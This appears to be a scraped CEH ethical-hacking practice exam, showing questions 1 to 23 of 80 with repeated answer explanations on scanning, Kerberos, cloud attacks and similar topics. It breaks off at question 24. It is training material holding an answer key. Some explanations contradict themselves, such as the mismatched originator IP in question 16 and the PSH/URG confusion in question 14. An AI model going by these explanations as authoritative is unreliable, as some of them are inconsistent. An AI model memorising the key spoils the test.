You have already completed the Test before. Hence you can not start it again.
Test is loading...
You must sign in or sign up to start the Test.
You have to finish following quiz, to start this Test:
Your results are here!! for" CEH Practice Test 2 "
0 of 80 questions answered correctly
Your time:
Time has elapsed
Your Final Score is : 0
You have attempted : 0
Number of Correct Questions : 0 and scored 0
Number of Incorrect Questions : 0 and Negative marks 0
Average score
Your score
CEH
You have attempted: 0
Number of Correct Questions: 0 and scored 0
Number of Incorrect Questions: 0 and Negative marks 0
You can review your answers by clicking view questions. Important Note : Open Reference Documentation Links in New Tab (Right Click and Open in New Tab).
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
Answered
Review
Question 1 of 80
1. Question
Which of the following attacks is also known as “cross-guest VM breach”?
Correct
Correct Answer:
Side channel is correct.
Side-channel attacks, also known as “cross-guest VM breach,” deal with the virtualization itself. If an attacker can somehow gain control of an existing VM (or place his own) on the same physical host as the target, he may be able to pull off lots of naughty activities.
Incorrect Answers:
Session riding, CSRF, and VM strafing are incorrect.
Session riding is, in effect, simply CSRF under a different name and deals with cloud services instead of traditional data centers.
CSRF is an attack leveraging a legitimate open session with a phishing attack to send a message from the user’s browser to the target server without the user knowing it.
VM strafing sounds like fun, depending on the caliber, but is not a legitimate attack.
Incorrect
Correct Answer:
Side channel is correct.
Side-channel attacks, also known as “cross-guest VM breach,” deal with the virtualization itself. If an attacker can somehow gain control of an existing VM (or place his own) on the same physical host as the target, he may be able to pull off lots of naughty activities.
Incorrect Answers:
Session riding, CSRF, and VM strafing are incorrect.
Session riding is, in effect, simply CSRF under a different name and deals with cloud services instead of traditional data centers.
CSRF is an attack leveraging a legitimate open session with a phishing attack to send a message from the user’s browser to the target server without the user knowing it.
VM strafing sounds like fun, depending on the caliber, but is not a legitimate attack.
Unattempted
Correct Answer:
Side channel is correct.
Side-channel attacks, also known as “cross-guest VM breach,” deal with the virtualization itself. If an attacker can somehow gain control of an existing VM (or place his own) on the same physical host as the target, he may be able to pull off lots of naughty activities.
Incorrect Answers:
Session riding, CSRF, and VM strafing are incorrect.
Session riding is, in effect, simply CSRF under a different name and deals with cloud services instead of traditional data centers.
CSRF is an attack leveraging a legitimate open session with a phishing attack to send a message from the user’s browser to the target server without the user knowing it.
VM strafing sounds like fun, depending on the caliber, but is not a legitimate attack.
Question 2 of 80
2. Question
Which of the following describes a primary advantage for using Digest authentication over Basic authentication?
Correct
Correct Answer:
Digest authentication never sends a password in clear text over the network is correct.
There are a couple of different methods a web page can use to negotiate credentials with a web user using HTTP. Digest authentication hashes a password before sending it, whereas Basic just sends it in plain text.
Incorrect Answers:
Digest authentication uses multifactor authentication, In Digest authentication, the password is sent in clear text over the network but is never reused, and In Digest authentication, Kerberos is used to encrypt the password are incorrect.
The remaining answers do not describe Digest authentication.
Incorrect
Correct Answer:
Digest authentication never sends a password in clear text over the network is correct.
There are a couple of different methods a web page can use to negotiate credentials with a web user using HTTP. Digest authentication hashes a password before sending it, whereas Basic just sends it in plain text.
Incorrect Answers:
Digest authentication uses multifactor authentication, In Digest authentication, the password is sent in clear text over the network but is never reused, and In Digest authentication, Kerberos is used to encrypt the password are incorrect.
The remaining answers do not describe Digest authentication.
Unattempted
Correct Answer:
Digest authentication never sends a password in clear text over the network is correct.
There are a couple of different methods a web page can use to negotiate credentials with a web user using HTTP. Digest authentication hashes a password before sending it, whereas Basic just sends it in plain text.
Incorrect Answers:
Digest authentication uses multifactor authentication, In Digest authentication, the password is sent in clear text over the network but is never reused, and In Digest authentication, Kerberos is used to encrypt the password are incorrect.
The remaining answers do not describe Digest authentication.
Question 3 of 80
3. Question
Which of the following is a passive wireless discovery tool?
Correct
Correct Answer:
Kismet is correct.
Kismet works as a passive network discovery tool, without using packet interjection to gather information. Kismet also works by channel hopping to discover as many networks as possible and has the ability to sniff packets and save them to a log file, readable by Wireshark or tcpdump.
Incorrect Answers:
NetStumbler, Aircrack, and Netsniff are incorrect.
NetStumbler is an active discovery tool. Aircrack is a WEP cracking program. Netsniff is a false choice.
Incorrect
Correct Answer:
Kismet is correct.
Kismet works as a passive network discovery tool, without using packet interjection to gather information. Kismet also works by channel hopping to discover as many networks as possible and has the ability to sniff packets and save them to a log file, readable by Wireshark or tcpdump.
Incorrect Answers:
NetStumbler, Aircrack, and Netsniff are incorrect.
NetStumbler is an active discovery tool. Aircrack is a WEP cracking program. Netsniff is a false choice.
Unattempted
Correct Answer:
Kismet is correct.
Kismet works as a passive network discovery tool, without using packet interjection to gather information. Kismet also works by channel hopping to discover as many networks as possible and has the ability to sniff packets and save them to a log file, readable by Wireshark or tcpdump.
Incorrect Answers:
NetStumbler, Aircrack, and Netsniff are incorrect.
NetStumbler is an active discovery tool. Aircrack is a WEP cracking program. Netsniff is a false choice.
Question 4 of 80
4. Question
Which of the following is most likely to interfere with a system’s resource usage?
Correct
Correct Answers:
HIDS is correct.
A host-based intrusion detection system (HIDS) is, by design, host based. Therefore, it is installed on the system itself and eats up resources like I do hot doughnuts. HIDSs are great at providing an additional layer of protection in your environment, but they do come at a resource cost.
Incorrect Answers:
IPS, Packet-filtering firewall, and NIDS are incorrect.
An intrusion prevention system, packet-filtering firewall, and network intrusion detection system are all network based and would not drain host resources.
Incorrect
Correct Answers:
HIDS is correct.
A host-based intrusion detection system (HIDS) is, by design, host based. Therefore, it is installed on the system itself and eats up resources like I do hot doughnuts. HIDSs are great at providing an additional layer of protection in your environment, but they do come at a resource cost.
Incorrect Answers:
IPS, Packet-filtering firewall, and NIDS are incorrect.
An intrusion prevention system, packet-filtering firewall, and network intrusion detection system are all network based and would not drain host resources.
Unattempted
Correct Answers:
HIDS is correct.
A host-based intrusion detection system (HIDS) is, by design, host based. Therefore, it is installed on the system itself and eats up resources like I do hot doughnuts. HIDSs are great at providing an additional layer of protection in your environment, but they do come at a resource cost.
Incorrect Answers:
IPS, Packet-filtering firewall, and NIDS are incorrect.
An intrusion prevention system, packet-filtering firewall, and network intrusion detection system are all network based and would not drain host resources.
Question 5 of 80
5. Question
Which of the following is a symmetric algorithm?
Correct
Correct Answer:
DES is correct.
DES is the only symmetric algorithm listed.
Incorrect Answers:
SHA-1, Diffie-Hellman, and ECC are incorrect.
None of these options is a symmetric algorithm.
Incorrect
Correct Answer:
DES is correct.
DES is the only symmetric algorithm listed.
Incorrect Answers:
SHA-1, Diffie-Hellman, and ECC are incorrect.
None of these options is a symmetric algorithm.
Unattempted
Correct Answer:
DES is correct.
DES is the only symmetric algorithm listed.
Incorrect Answers:
SHA-1, Diffie-Hellman, and ECC are incorrect.
None of these options is a symmetric algorithm.
Question 6 of 80
6. Question
Examine this robots.txt file: “` User-agent: * Disallow: / “` Which of the following is true regarding the website this file is currently residing on?
Correct
Correct Answer:
All web spiders are prevented from indexing any page on the site is correct.
Robot.txt files are annoying little entries on the exam but are easy enough to figure out. The User-agent section defines which web crawler you’re attempting to advise (in this case, all of them). The Disallow section defines those areas you do not want the crawler to sift through; just having a slash (/) effectively states “don’t look at anything here.”
Incorrect Answers:
All web spiders are allowed to index any page on the site, Only authenticated web spiders are prevented from indexing any page on the site, and Only authenticated web spiders are allowed to index any page on the site are incorrect.
These answers do not match the * entry in User-agent and the / entry in Disallow.
Incorrect
Correct Answer:
All web spiders are prevented from indexing any page on the site is correct.
Robot.txt files are annoying little entries on the exam but are easy enough to figure out. The User-agent section defines which web crawler you’re attempting to advise (in this case, all of them). The Disallow section defines those areas you do not want the crawler to sift through; just having a slash (/) effectively states “don’t look at anything here.”
Incorrect Answers:
All web spiders are allowed to index any page on the site, Only authenticated web spiders are prevented from indexing any page on the site, and Only authenticated web spiders are allowed to index any page on the site are incorrect.
These answers do not match the * entry in User-agent and the / entry in Disallow.
Unattempted
Correct Answer:
All web spiders are prevented from indexing any page on the site is correct.
Robot.txt files are annoying little entries on the exam but are easy enough to figure out. The User-agent section defines which web crawler you’re attempting to advise (in this case, all of them). The Disallow section defines those areas you do not want the crawler to sift through; just having a slash (/) effectively states “don’t look at anything here.”
Incorrect Answers:
All web spiders are allowed to index any page on the site, Only authenticated web spiders are prevented from indexing any page on the site, and Only authenticated web spiders are allowed to index any page on the site are incorrect.
These answers do not match the * entry in User-agent and the / entry in Disallow.
Question 7 of 80
7. Question
Payment Card Industry Data Security Standard (PCI-DSS) requires organizations to perform external and internal penetration testing. What is the required occurrence?
Correct
Correct Answer:
At least once a year and after any significant infrastructure or application upgrade or modification is correct.
PCI-DSS requires organizations to be tested at least once a year, and of course after any “significant” modifications.
Incorrect Answers:
At least once every three years and after any significant infrastructure or application upgrade or modification, At least once every two years and after any significant infrastructure or application upgrade or modification, and Twice annually and after any significant infrastructure or application upgrade or modification are incorrect.
These answers don’t reflect PCI-DSS requirements.
Incorrect
Correct Answer:
At least once a year and after any significant infrastructure or application upgrade or modification is correct.
PCI-DSS requires organizations to be tested at least once a year, and of course after any “significant” modifications.
Incorrect Answers:
At least once every three years and after any significant infrastructure or application upgrade or modification, At least once every two years and after any significant infrastructure or application upgrade or modification, and Twice annually and after any significant infrastructure or application upgrade or modification are incorrect.
These answers don’t reflect PCI-DSS requirements.
Unattempted
Correct Answer:
At least once a year and after any significant infrastructure or application upgrade or modification is correct.
PCI-DSS requires organizations to be tested at least once a year, and of course after any “significant” modifications.
Incorrect Answers:
At least once every three years and after any significant infrastructure or application upgrade or modification, At least once every two years and after any significant infrastructure or application upgrade or modification, and Twice annually and after any significant infrastructure or application upgrade or modification are incorrect.
These answers don’t reflect PCI-DSS requirements.
Question 8 of 80
8. Question
Which of the following is least likely to mitigate social engineering attacks?
Correct
Correct Answer:
Ensuring strong password policy is in place and enforced is correct.
What good does a really strong password do you if you hand it over to the nice gentleman calling from the help desk about your computer problems?
Incorrect Answers:
Beginning user education programs in the organization, Installing anti-malware systems on organization desktops, and Implementing e-mail gateways are incorrect.
User education is always a good step.
Anti-malware will help prevent damage done when someone falls victim to social engineering.
E-mail gateways screen and filter incoming messages for malicious content.
Incorrect
Correct Answer:
Ensuring strong password policy is in place and enforced is correct.
What good does a really strong password do you if you hand it over to the nice gentleman calling from the help desk about your computer problems?
Incorrect Answers:
Beginning user education programs in the organization, Installing anti-malware systems on organization desktops, and Implementing e-mail gateways are incorrect.
User education is always a good step.
Anti-malware will help prevent damage done when someone falls victim to social engineering.
E-mail gateways screen and filter incoming messages for malicious content.
Unattempted
Correct Answer:
Ensuring strong password policy is in place and enforced is correct.
What good does a really strong password do you if you hand it over to the nice gentleman calling from the help desk about your computer problems?
Incorrect Answers:
Beginning user education programs in the organization, Installing anti-malware systems on organization desktops, and Implementing e-mail gateways are incorrect.
User education is always a good step.
Anti-malware will help prevent damage done when someone falls victim to social engineering.
E-mail gateways screen and filter incoming messages for malicious content.
Question 9 of 80
9. Question
Which of the following best describes a wrapping attack?
Correct
Correct Answer:
A SOAP message is intercepted, data in the envelope is changed, and then it is sent/replayed is correct.
Wrapping attacks involve messing with SOAP messages and replaying them as legitimate.
Incorrect Answers:
CSRF-type attack against cloud computing resources, An attack involving leveraging a new or existing VM on a physical device against another VM, and The virtual machine management system on the physical machine is corrupted or administrative control is gained over it are incorrect.
These do not reflect a wrapping attack.
Incorrect
Correct Answer:
A SOAP message is intercepted, data in the envelope is changed, and then it is sent/replayed is correct.
Wrapping attacks involve messing with SOAP messages and replaying them as legitimate.
Incorrect Answers:
CSRF-type attack against cloud computing resources, An attack involving leveraging a new or existing VM on a physical device against another VM, and The virtual machine management system on the physical machine is corrupted or administrative control is gained over it are incorrect.
These do not reflect a wrapping attack.
Unattempted
Correct Answer:
A SOAP message is intercepted, data in the envelope is changed, and then it is sent/replayed is correct.
Wrapping attacks involve messing with SOAP messages and replaying them as legitimate.
Incorrect Answers:
CSRF-type attack against cloud computing resources, An attack involving leveraging a new or existing VM on a physical device against another VM, and The virtual machine management system on the physical machine is corrupted or administrative control is gained over it are incorrect.
These do not reflect a wrapping attack.
Question 10 of 80
10. Question
James is a member of a pen test team newly hired to test a bank’s security. He begins searching for IP addresses the bank may own, using public records on the Internet, and also looks up news articles and job postings to discover information that may be valuable. What phase of the pen test is James working?
Correct
Pre-attack is correct.
The pre-attack phase (a.k.a the preparation phase) is where all this activity takes place—including the passive information gathering performed by James in this example. This would be followed by the attack and post-attack phases.
Incorrect Answers:
Reconnaissance, Assessment, Attack, and Scanning are incorrect.
Reconnaissance and scanning are part of the ethical hacking phases (reconnaissance, scanning/enumeration, gaining access, maintaining access, and clearing tracks).
Assessment is akin to the attack phase.
Incorrect
Pre-attack is correct.
The pre-attack phase (a.k.a the preparation phase) is where all this activity takes place—including the passive information gathering performed by James in this example. This would be followed by the attack and post-attack phases.
Incorrect Answers:
Reconnaissance, Assessment, Attack, and Scanning are incorrect.
Reconnaissance and scanning are part of the ethical hacking phases (reconnaissance, scanning/enumeration, gaining access, maintaining access, and clearing tracks).
Assessment is akin to the attack phase.
Unattempted
Pre-attack is correct.
The pre-attack phase (a.k.a the preparation phase) is where all this activity takes place—including the passive information gathering performed by James in this example. This would be followed by the attack and post-attack phases.
Incorrect Answers:
Reconnaissance, Assessment, Attack, and Scanning are incorrect.
Reconnaissance and scanning are part of the ethical hacking phases (reconnaissance, scanning/enumeration, gaining access, maintaining access, and clearing tracks).
Assessment is akin to the attack phase.
Question 11 of 80
11. Question
A web application in your organization provides significant benefit to the accounting team. However, after a vulnerability scan and a risk assessment, it is determined the application presents significant risk if exposed to external attackers. The server hosting the application is moved inside the DMZ and strong access controls are put into place, allowing only the accounting team to use it. Which of the following best describes the risk method used here?
Correct
Correct answer:
The organization is mitigating the risk is correct.
The actions taken and controls put in place are deigned to mitigate the risk—reducing greatly the likelihood it will ever happen.
Incorrect answers:
Accepting the risk equates to not doing anything at all.
Transferring the risk occurs when a company shifts the risk to another party.
Avoiding the risk is removing it altogether.
Incorrect
Correct answer:
The organization is mitigating the risk is correct.
The actions taken and controls put in place are deigned to mitigate the risk—reducing greatly the likelihood it will ever happen.
Incorrect answers:
Accepting the risk equates to not doing anything at all.
Transferring the risk occurs when a company shifts the risk to another party.
Avoiding the risk is removing it altogether.
Unattempted
Correct answer:
The organization is mitigating the risk is correct.
The actions taken and controls put in place are deigned to mitigate the risk—reducing greatly the likelihood it will ever happen.
Incorrect answers:
Accepting the risk equates to not doing anything at all.
Transferring the risk occurs when a company shifts the risk to another party.
Avoiding the risk is removing it altogether.
Question 12 of 80
12. Question
You want to create a document that shows how to install data-at-rest protection within your system. Which of the following is the best descriptor of the document you are creating?
Correct
Correct Answer:
Procedure is correct.
A procedures document is a step-by-step description of how to accomplish a specific task.
Incorrect Answers:
Guideline, Standard, and Policy are incorrect.
Guidelines are discretionary but highly encouraged (that is, you may not absolutely require DAR protection on all systems, but your guidelines document might encourage users to use it anyway).
A standard defines technical aspects of your security architecture (like what software and hardware are necessary) and is mandatory.
A policy is an overarching document that contains the purpose, scope, responsibilities, and compliance details of your security program.
Incorrect
Correct Answer:
Procedure is correct.
A procedures document is a step-by-step description of how to accomplish a specific task.
Incorrect Answers:
Guideline, Standard, and Policy are incorrect.
Guidelines are discretionary but highly encouraged (that is, you may not absolutely require DAR protection on all systems, but your guidelines document might encourage users to use it anyway).
A standard defines technical aspects of your security architecture (like what software and hardware are necessary) and is mandatory.
A policy is an overarching document that contains the purpose, scope, responsibilities, and compliance details of your security program.
Unattempted
Correct Answer:
Procedure is correct.
A procedures document is a step-by-step description of how to accomplish a specific task.
Incorrect Answers:
Guideline, Standard, and Policy are incorrect.
Guidelines are discretionary but highly encouraged (that is, you may not absolutely require DAR protection on all systems, but your guidelines document might encourage users to use it anyway).
A standard defines technical aspects of your security architecture (like what software and hardware are necessary) and is mandatory.
A policy is an overarching document that contains the purpose, scope, responsibilities, and compliance details of your security program.
Question 13 of 80
13. Question
While using your bank’s online services, you notice the following string in the URL bar: http://www.MyPersonalBank/Account?Id=368940911028389&Damount=10980&Camount=21 You observe that if you modify the Damount and Camount values and submit the request, the data on the web page reflect the changes. What type of vulnerability is present on this site?
Correct
Correct Answer:
Parameter tampering is correct.
One of the easiest things you can attempt is simply changing the parameter fields in a URL and seeing what happens.
Incorrect Answers:
SQL injection, XSS, and Cookie tampering are incorrect.
These do not reflect the attack shown.
Incorrect
Correct Answer:
Parameter tampering is correct.
One of the easiest things you can attempt is simply changing the parameter fields in a URL and seeing what happens.
Incorrect Answers:
SQL injection, XSS, and Cookie tampering are incorrect.
These do not reflect the attack shown.
Unattempted
Correct Answer:
Parameter tampering is correct.
One of the easiest things you can attempt is simply changing the parameter fields in a URL and seeing what happens.
Incorrect Answers:
SQL injection, XSS, and Cookie tampering are incorrect.
These do not reflect the attack shown.
Question 14 of 80
14. Question
Which TCP flag is used to force transmission of data even if the buffer is full?
Correct
Correct answer:
PSH is correct.
The PSH flag is used when the application simply can’t wait for the data and needs it immediately. The sender will be working through a standard exchange and placing packets into the buffer as space frees up. An URG packet gets sent regardless of the buffer status; it simply goes.
Incorrect answers:
An URG flagged packet is treated with importance, almost like holding a reservation tag that lets you go to the front of the line when you arrive at your destination.
ACK is used for acknowledgments, and FIN brings an orderly close to the session.
Incorrect
Correct answer:
PSH is correct.
The PSH flag is used when the application simply can’t wait for the data and needs it immediately. The sender will be working through a standard exchange and placing packets into the buffer as space frees up. An URG packet gets sent regardless of the buffer status; it simply goes.
Incorrect answers:
An URG flagged packet is treated with importance, almost like holding a reservation tag that lets you go to the front of the line when you arrive at your destination.
ACK is used for acknowledgments, and FIN brings an orderly close to the session.
Unattempted
Correct answer:
PSH is correct.
The PSH flag is used when the application simply can’t wait for the data and needs it immediately. The sender will be working through a standard exchange and placing packets into the buffer as space frees up. An URG packet gets sent regardless of the buffer status; it simply goes.
Incorrect answers:
An URG flagged packet is treated with importance, almost like holding a reservation tag that lets you go to the front of the line when you arrive at your destination.
ACK is used for acknowledgments, and FIN brings an orderly close to the session.
Question 15 of 80
15. Question
Your organization uses a cloud computing model that shares cloud infrastructure for data and services. Which deployment model matches this description?
Correct
Correct Answer:
Community is correct.
A community cloud model is one where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations.
Incorrect Answers:
Private, Public, and Hybrid are incorrect.
A private cloud model is operated solely for a single organization (a.k.a. single-tenant environment), is usually not a pay-as-you-go type of operation, and is usually preferred by larger organizations.
A public cloud model is one where services are provided over a network that is open for public use (like the Internet).
The hybrid cloud model is a composite of two or more cloud deployment models.
Incorrect
Correct Answer:
Community is correct.
A community cloud model is one where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations.
Incorrect Answers:
Private, Public, and Hybrid are incorrect.
A private cloud model is operated solely for a single organization (a.k.a. single-tenant environment), is usually not a pay-as-you-go type of operation, and is usually preferred by larger organizations.
A public cloud model is one where services are provided over a network that is open for public use (like the Internet).
The hybrid cloud model is a composite of two or more cloud deployment models.
Unattempted
Correct Answer:
Community is correct.
A community cloud model is one where the infrastructure is shared by several organizations, usually with the same policy and compliance considerations.
Incorrect Answers:
Private, Public, and Hybrid are incorrect.
A private cloud model is operated solely for a single organization (a.k.a. single-tenant environment), is usually not a pay-as-you-go type of operation, and is usually preferred by larger organizations.
A public cloud model is one where services are provided over a network that is open for public use (like the Internet).
The hybrid cloud model is a composite of two or more cloud deployment models.
Question 16 of 80
16. Question
Examine the e-mail header provided. Which of the following represents the true originator of the e-mail message? “` Return-path: Delivery-date: Wed, 13 Apr 2011 00:31:13 +0200 Received: from mailexchanger.anotherbiz.com([185.213.4.77]) by mailserver.anotherbiz.com running ExIM with esmtp id xxxxxx-xxxxxx-xxx; Wed, 13 Apr 2011 01:39:23 +0200 Received: from mailserver.anybiz.com ([177.190.50.254] helo=mailserver.anybiz.com) by mailexchanger.anotherbiz.com with esmtp id xxxxxx-xxxxxx-xx for [email protected]; Wed, 13 Apr 2011 01:39:23 +0200 Received: from SOMEONEComputer [229.88.53.154] (helo=[SOMEONEcomputer]) by mailserver.anybiz.com with esmtpa (Exim x.xx) (envelope-from [email protected]; Tue, 12 Apr 2011 20:36:08 -0100 Message-ID: Date: Tue, 12 Apr 2011 20:36:01 -0100 X-Mailer: Mail Client From: SOMEONE Name To: USERJOE Name Subject: Something to consider … “`
Correct
Correct Answer:
The originator is 229.88.53.154 is correct.
On e-mail headers, you’ll most likely be asked to identify the true originator—although there are many other entries to pay attention to. The machine (person) who sent the message in the first place may be impossible to truly decipher, since in the real world attackers have proxies and whatnot to hide behind; however, we can only go off the header provided. From the bottom up (the bottom entry is the first in the line), the originator is clearly shown: Received: from SOMEONEComputer [217.88.53.154] (helo=[SOMEONEcomputer]).
Incorrect Answers:
The originator is 185.213.4.77, The originator is 177.190.50.254, and The e-mail header does not show this information are incorrect.
These IPs do not represent the true originator of the message.
They show e-mail servers that are passing/handling the message.
Incorrect
Correct Answer:
The originator is 229.88.53.154 is correct.
On e-mail headers, you’ll most likely be asked to identify the true originator—although there are many other entries to pay attention to. The machine (person) who sent the message in the first place may be impossible to truly decipher, since in the real world attackers have proxies and whatnot to hide behind; however, we can only go off the header provided. From the bottom up (the bottom entry is the first in the line), the originator is clearly shown: Received: from SOMEONEComputer [217.88.53.154] (helo=[SOMEONEcomputer]).
Incorrect Answers:
The originator is 185.213.4.77, The originator is 177.190.50.254, and The e-mail header does not show this information are incorrect.
These IPs do not represent the true originator of the message.
They show e-mail servers that are passing/handling the message.
Unattempted
Correct Answer:
The originator is 229.88.53.154 is correct.
On e-mail headers, you’ll most likely be asked to identify the true originator—although there are many other entries to pay attention to. The machine (person) who sent the message in the first place may be impossible to truly decipher, since in the real world attackers have proxies and whatnot to hide behind; however, we can only go off the header provided. From the bottom up (the bottom entry is the first in the line), the originator is clearly shown: Received: from SOMEONEComputer [217.88.53.154] (helo=[SOMEONEcomputer]).
Incorrect Answers:
The originator is 185.213.4.77, The originator is 177.190.50.254, and The e-mail header does not show this information are incorrect.
These IPs do not represent the true originator of the message.
They show e-mail servers that are passing/handling the message.
Question 17 of 80
17. Question
During a pen test, the team lead decides to attempt intrusion using the organization’s BlackBerry Enterprise. Which tool is used in the blackjacking attempt?
Correct
Correct Answer:
BBProxy is correct.
Since BlackBerry devices are basically VPN’d into the corporate network, they can provide a nice back way in, using the proper technique. Blackjacking involves setting up a proxy and bouncing things off and through it into the internal network. BBProxy was presented during a DEF CON conference several years ago as a means to pull off this attack.
Incorrect Answers:
Aircrack, Kismet, and PrismStumbler are incorrect.
Aircrack is used to crack WEP encryption keys.
Kismet is best known as a passive wireless sniffer.
PrismStumbler is a wireless network identifier.
Incorrect
Correct Answer:
BBProxy is correct.
Since BlackBerry devices are basically VPN’d into the corporate network, they can provide a nice back way in, using the proper technique. Blackjacking involves setting up a proxy and bouncing things off and through it into the internal network. BBProxy was presented during a DEF CON conference several years ago as a means to pull off this attack.
Incorrect Answers:
Aircrack, Kismet, and PrismStumbler are incorrect.
Aircrack is used to crack WEP encryption keys.
Kismet is best known as a passive wireless sniffer.
PrismStumbler is a wireless network identifier.
Unattempted
Correct Answer:
BBProxy is correct.
Since BlackBerry devices are basically VPN’d into the corporate network, they can provide a nice back way in, using the proper technique. Blackjacking involves setting up a proxy and bouncing things off and through it into the internal network. BBProxy was presented during a DEF CON conference several years ago as a means to pull off this attack.
Incorrect Answers:
Aircrack, Kismet, and PrismStumbler are incorrect.
Aircrack is used to crack WEP encryption keys.
Kismet is best known as a passive wireless sniffer.
PrismStumbler is a wireless network identifier.
Question 18 of 80
18. Question
Which of the following would most likely be used to encrypt an entire hard drive?
Correct
Correct Answer:
PGP is correct.
Pretty Good Privacy (PGP) uses an asymmetric encryption method to encrypt information.
Although generally associated with e-mail, it can encrypt virtually anything. PGP uses public/private key encryption.
Incorrect Answers:
TLS, SSH, and SSL are incorrect.
TLS and SSL are encryption algorithms for network traffic. SSH is an encrypted version of telnet.
Incorrect
Correct Answer:
PGP is correct.
Pretty Good Privacy (PGP) uses an asymmetric encryption method to encrypt information.
Although generally associated with e-mail, it can encrypt virtually anything. PGP uses public/private key encryption.
Incorrect Answers:
TLS, SSH, and SSL are incorrect.
TLS and SSL are encryption algorithms for network traffic. SSH is an encrypted version of telnet.
Unattempted
Correct Answer:
PGP is correct.
Pretty Good Privacy (PGP) uses an asymmetric encryption method to encrypt information.
Although generally associated with e-mail, it can encrypt virtually anything. PGP uses public/private key encryption.
Incorrect Answers:
TLS, SSH, and SSL are incorrect.
TLS and SSL are encryption algorithms for network traffic. SSH is an encrypted version of telnet.
Question 19 of 80
19. Question
OSSTMM defines interactive and process controls. Which of the following are process controls?
Correct
Correct Answer:
Nonrepudiation, confidentiality, privacy is correct.
The Open Source Security Testing Methodology Manual (OSSTMM) notes ten different types of controls. Process controls are nonrepudiation, confidentiality, privacy, integrity, and alarm.
Incorrect Answers:
Authentication, indemnification, resilience, Subjugation, continuity, authentication, and Integrity, alarm, authentication are incorrect.
Interactive controls include authentication, indemnification, resilience, subjugation, and continuity.
Incorrect
Correct Answer:
Nonrepudiation, confidentiality, privacy is correct.
The Open Source Security Testing Methodology Manual (OSSTMM) notes ten different types of controls. Process controls are nonrepudiation, confidentiality, privacy, integrity, and alarm.
Incorrect Answers:
Authentication, indemnification, resilience, Subjugation, continuity, authentication, and Integrity, alarm, authentication are incorrect.
Interactive controls include authentication, indemnification, resilience, subjugation, and continuity.
Unattempted
Correct Answer:
Nonrepudiation, confidentiality, privacy is correct.
The Open Source Security Testing Methodology Manual (OSSTMM) notes ten different types of controls. Process controls are nonrepudiation, confidentiality, privacy, integrity, and alarm.
Incorrect Answers:
Authentication, indemnification, resilience, Subjugation, continuity, authentication, and Integrity, alarm, authentication are incorrect.
Interactive controls include authentication, indemnification, resilience, subjugation, and continuity.
Question 20 of 80
20. Question
You are performing an XMAS scan and get an RST/ACK packet back from a port. What does this indicate?
Correct
Correct answer:
The port is closed is correct.
An RST/ACK on an XMAS scan indicates a closed port.
Incorrect answers:
The port is open, The scan has failed to reach the target, and None of the above are incorrect.
No response would indicate an open port or that the scan failed to reach the target.
Incorrect
Correct answer:
The port is closed is correct.
An RST/ACK on an XMAS scan indicates a closed port.
Incorrect answers:
The port is open, The scan has failed to reach the target, and None of the above are incorrect.
No response would indicate an open port or that the scan failed to reach the target.
Unattempted
Correct answer:
The port is closed is correct.
An RST/ACK on an XMAS scan indicates a closed port.
Incorrect answers:
The port is open, The scan has failed to reach the target, and None of the above are incorrect.
No response would indicate an open port or that the scan failed to reach the target.
Question 21 of 80
21. Question
Which of the following is not a component of a Kerberos system?
Correct
Correct Answer:
PKI is correct.
A Kerberos system is composed of a key distribution center (KDC), an authentication service (AS), a ticket granting service (TGS), and a ticket granting ticket (TGT). PKI has nothing to do with it.
Incorrect Answers:
KDC, AS, TGT, and TGS are incorrect.
These are all part of a Kerberos system.
Incorrect
Correct Answer:
PKI is correct.
A Kerberos system is composed of a key distribution center (KDC), an authentication service (AS), a ticket granting service (TGS), and a ticket granting ticket (TGT). PKI has nothing to do with it.
Incorrect Answers:
KDC, AS, TGT, and TGS are incorrect.
These are all part of a Kerberos system.
Unattempted
Correct Answer:
PKI is correct.
A Kerberos system is composed of a key distribution center (KDC), an authentication service (AS), a ticket granting service (TGS), and a ticket granting ticket (TGT). PKI has nothing to do with it.
Incorrect Answers:
KDC, AS, TGT, and TGS are incorrect.
These are all part of a Kerberos system.
Question 22 of 80
22. Question
A switch CAM table is filled with faulty MAC addresses, using up all available space in the table. Which of the following has occurred?
Correct
Correct Answer:
MAC flood is correct.
A MAC flood is just what it sounds like—the switch is flooded with thousands of MAC address mappings such that it cannot keep up. When the table can’t keep up, the switch stops filtering messages to ports and begins flooding itself, sending every message out every port.
Incorrect Answers:
SYN flood, CAM attack, and ARP spoofing are incorrect.
SYN flood is not a switch attack.
ARP spoofing will help in active sniffing, but it is not the same as MAC flooding.
CAM attack is not a valid term.
Incorrect
Correct Answer:
MAC flood is correct.
A MAC flood is just what it sounds like—the switch is flooded with thousands of MAC address mappings such that it cannot keep up. When the table can’t keep up, the switch stops filtering messages to ports and begins flooding itself, sending every message out every port.
Incorrect Answers:
SYN flood, CAM attack, and ARP spoofing are incorrect.
SYN flood is not a switch attack.
ARP spoofing will help in active sniffing, but it is not the same as MAC flooding.
CAM attack is not a valid term.
Unattempted
Correct Answer:
MAC flood is correct.
A MAC flood is just what it sounds like—the switch is flooded with thousands of MAC address mappings such that it cannot keep up. When the table can’t keep up, the switch stops filtering messages to ports and begins flooding itself, sending every message out every port.
Incorrect Answers:
SYN flood, CAM attack, and ARP spoofing are incorrect.
SYN flood is not a switch attack.
ARP spoofing will help in active sniffing, but it is not the same as MAC flooding.
CAM attack is not a valid term.
Question 23 of 80
23. Question
Which of the following are components of a Kerberos system? (Choose all that apply.)
Correct
Correct Answers:
KDC, AS, TGS, and TGT are correct.
A Kerberos system is composed of a key distribution center (KDC), an authentication service (AS), a ticket granting service (TGS), and a ticket granting ticket (TGT).
Incorrect Answer:
PKI is incorrect.
Kerberos does not make use of any PKI facets in its system.
Incorrect
Correct Answers:
KDC, AS, TGS, and TGT are correct.
A Kerberos system is composed of a key distribution center (KDC), an authentication service (AS), a ticket granting service (TGS), and a ticket granting ticket (TGT).
Incorrect Answer:
PKI is incorrect.
Kerberos does not make use of any PKI facets in its system.
Unattempted
Correct Answers:
KDC, AS, TGS, and TGT are correct.
A Kerberos system is composed of a key distribution center (KDC), an authentication service (AS), a ticket granting service (TGS), and a ticket granting ticket (TGT).
Incorrect Answer:
PKI is incorrect.
Kerberos does not make use of any PKI facets in its system.
Question 24 of 80
24. Question
What is considered the best option against session hijacking?
Correct
Correct Answer:
